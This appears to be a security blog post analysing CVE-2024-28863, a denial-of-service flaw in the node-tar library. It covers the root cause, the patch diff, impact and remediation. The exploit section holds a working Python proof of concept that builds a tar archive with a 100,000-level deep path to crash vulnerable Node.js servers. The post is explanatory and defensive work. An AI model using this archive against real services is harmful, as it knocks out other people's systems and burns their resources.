CVE-2024-28863

The Infinite Hallway: Crashing Node.js with CVE-2024-28863

Alon Barad
Alon Barad
Software Engineer

Jan 29, 2026·6 min read·3 visits

Executive Summary (TL;DR)

If you let users upload tarballs, they can kill your server by nesting folders 200,000 levels deep. `node-tar` < 6.2.1 didn't check how deep the rabbit hole went, leading to instant memory exhaustion.

A high-impact Denial of Service (DoS) vulnerability in the ubiquitous `node-tar` library allows attackers to crash Node.js applications by supplying a tar archive with excessively deep directory structures. By exploiting the lack of depth validation, a malicious archive forces the parser to allocate massive arrays and iterate continuously, triggering an Out of Memory (OOM) crash or CPU exhaustion.

The Hook: Parsing Until You Die

In the world of software dependencies, node-tar is like the plumbing in your walls: you never think about it until it bursts and floods your basement with sewage. It is the de-facto library for handling tar archives in the Node.js ecosystem, used by npm itself, thousands of build tools, and likely that file upload service you deployed last Friday.

Most developers worry about malicious files trying to write outside the target directory (the classic 'Zip Slip' vulnerability). We spend hours sanitizing ../ from paths to stop attackers from overwriting /etc/passwd. But CVE-2024-28863 asks a different, more philosophical question: What happens if we just go down? Like, really, really far down?

This vulnerability is a classic resource exhaustion attack. It doesn't require complex memory corruption or ROP chains. It simply abuses the parser's optimism. The library assumed that no sane human would ever create a directory structure nested 50,000 levels deep. Unfortunately for node-tar, hackers are not sane humans.

The Flaw: Recursion is a Hell of a Drug

The root cause lies in lib/unpack.js, specifically within the [CHECKPATH] method. This function is responsible for ensuring that the directory structure exists before writing a file to disk. If you give it a path like a/b/c/file.txt, it politely ensures a, a/b, and a/b/c exist.

The logic involved taking the entry's path, normalizing it (fixing slashes), and then splitting it into an array of path segments. This sounds innocent enough in a Computer Science 101 class. But in V8 (the JavaScript engine powering Node.js), everything has a cost.

Here is the logic flaw: there was absolutely no check on the length of that array. An attacker can craft a tar header claiming a file is located at a/a/a/a/...[repeat 100k times].../file.txt. When node-tar receives this:

  1. It allocates a massive string for the path.
  2. It splits that massive string into a massive array.
  3. It tries to iterate over that massive array to check filesystem existence for every single segment.

This triggers a 'Death by 1000 Cuts' scenario. The string manipulation alone spikes memory usage. The loop hangs the Event Loop (blocking the single thread Node.js relies on). Eventually, the V8 garbage collector panics, waves a white flag, and the process crashes with FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory.

The Code: The Smoking Gun

Let's look at the fix to understand the breakage. The patch is remarkably simple, which highlights just how basic the oversight was. The maintainers introduced a maxDepth governor to the unpacking logic.

Here is the relevant diff from commit fe8cd57da5686f8695415414bda49206a545f7f7:

// The Band-Aid
const DEFAULT_MAX_DEPTH = 1024
 
// Inside the Unpack class
this.maxDepth = typeof opt.maxDepth === 'number'
  ? opt.maxDepth
  : DEFAULT_MAX_DEPTH
 
// The Check
[CHECKPATH] (entry) {
  const p = normPath(entry.path)
  const parts = p.split('/')
  
  // The new safety valve
  if (isFinite(this.maxDepth) && parts.length > this.maxDepth) {
    this.warn('TAR_ENTRY_ERROR', 'path excessively deep', {
      entry,
      path: p,
      depth: parts.length,
      maxDepth: this.maxDepth,
    })
    return false // Abort!
  }
  // ... rest of the logic
}

Before this patch, parts could be arbitrarily large. The fix simply says, "If you are nesting folders more than 1024 deep, you are doing something wrong, and we are not participating."

> [!NOTE] > Researcher Insight: While this limits the logic depth, the code still calls normPath(entry.path) and p.split('/') before the check. A theoretical attacker could still cause memory pressure by sending a path string so long that just splitting it exhausts memory, even if the depth check immediately fails afterwards. However, this is much harder to exploit than the recursion loop.

The Exploit: Building the Tower of Babel

You can't just open your terminal and type mkdir -p a/b/c... to create a Proof of Concept. Your Operating System (Linux, Windows, macOS) has limits on path lengths (usually 4096 bytes or MAX_PATH on Windows). If you try to create this structure on your disk to zip it up, your OS will stop you.

But here's the secret: The Tar format doesn't care about your OS limits.

We can bypass the OS entirely by constructing the Tar archive programmatically using Python. We generate the headers directly, lying to the tar structure about the existence of these folders. We don't need them to exist on our disk; we just need to tell node-tar they exist.

Here is how a researcher builds the weapon:

import tarfile
import io
 
# Create a path that is 200,000 characters deep
# "a/a/a/a/a..."
deep_path = "a/" * 100000 + "payload.txt"
 
with tarfile.open("death_by_depth.tar", "w") as tar:
    # Create a dummy file in memory
    data = b"pwned"
    info = tarfile.TarInfo(name=deep_path)
    info.size = len(data)
    
    # Add it to the archive
    tar.addfile(info, io.BytesIO(data))
 
print("Archive created. Don't try to extract this manually.")

When this file is fed to a vulnerable node-tar instance:

  1. The stream parser reads the header.
  2. It sees the path.
  3. It attempts to validate the directory structure.
  4. BOOM. The Node.js process is terminated by the OS or V8 watchdog.

The Impact: Why Availability Matters

DoS vulnerabilities often get a bad rap as being "boring" compared to RCE. But in a modern cloud environment, DoS is expensive.

Imagine a CI/CD pipeline that accepts user code repositories. If an attacker commits a death_by_depth.tar and your build server tries to unpack it using npm install (which uses node-tar), your build agent dies.

If you have auto-scaling enabled, your infrastructure might see the crash, assume the node is unhealthy, spin up a new one, and retry the job. The attacker has just created an infinite loop of crashing servers, burning through your cloud budget with a 5kb file.

Furthermore, because Node.js is single-threaded, this isn't just a memory crash. While node-tar is churning through that array of 100,000 elements, the Event Loop is blocked. No other requests are being handled. Health checks fail. The application becomes unresponsive instantly, even before the crash happens.

The Fix: Stopping the Bleeding

The remediation is straightforward, but it requires vigilance.

1. Upgrade immediately. Ensure node-tar is at version 6.2.1 or higher. If you are using npm, this might mean updating strictly nested dependencies. Use npm audit fix or manually traverse your package-lock.json to ensure no vulnerable versions linger in your tree.

2. Configuration Defense. If you are using node-tar programmatically, you can now enforce your own sanity limits. If you know your application only handles shallow archives, set the limit even lower:

tar.x({
  file: 'upload.tar',
  maxDepth: 10 // Be strict if you can
})

3. Validate before you Unpack. Never trust user input. If possible, inspect the file listing of an archive before extracting it. If you see a file path length that looks like a novel, reject it before passing it to the extractor.

Fix Analysis (1)

Technical Appendix

CVSS Score
6.5/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
EPSS Probability
0.45%
Top 37% most exploited

Affected Systems

node-tar < 6.2.1npm CLI (indirectly)node-gyp (indirectly)Any Node.js application extracting untrusted tarballs

Affected Versions Detail

Product
Affected Versions
Fixed Version
node-tar
isaacs
< 6.2.16.2.1
AttributeDetail
CWECWE-400 (Uncontrolled Resource Consumption)
Attack VectorNetwork (Malicious Archive)
CVSS6.5 (Medium)
ImpactDenial of Service (App Crash)
Fix Commitfe8cd57da5686f8695415414bda49206a545f7f7
EPSS Score0.45% (Moderate)
CWE-400
Uncontrolled Resource Consumption

The software does not properly restrict the size or amount of resources that are requested or influenced by an actor, which can be used to consume more resources than intended.

Vulnerability Timeline

Vulnerability discovered and reported
2024-03-12
Patch committed to node-tar repository
2024-03-16
CVE Published and Advisory released
2024-03-21

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.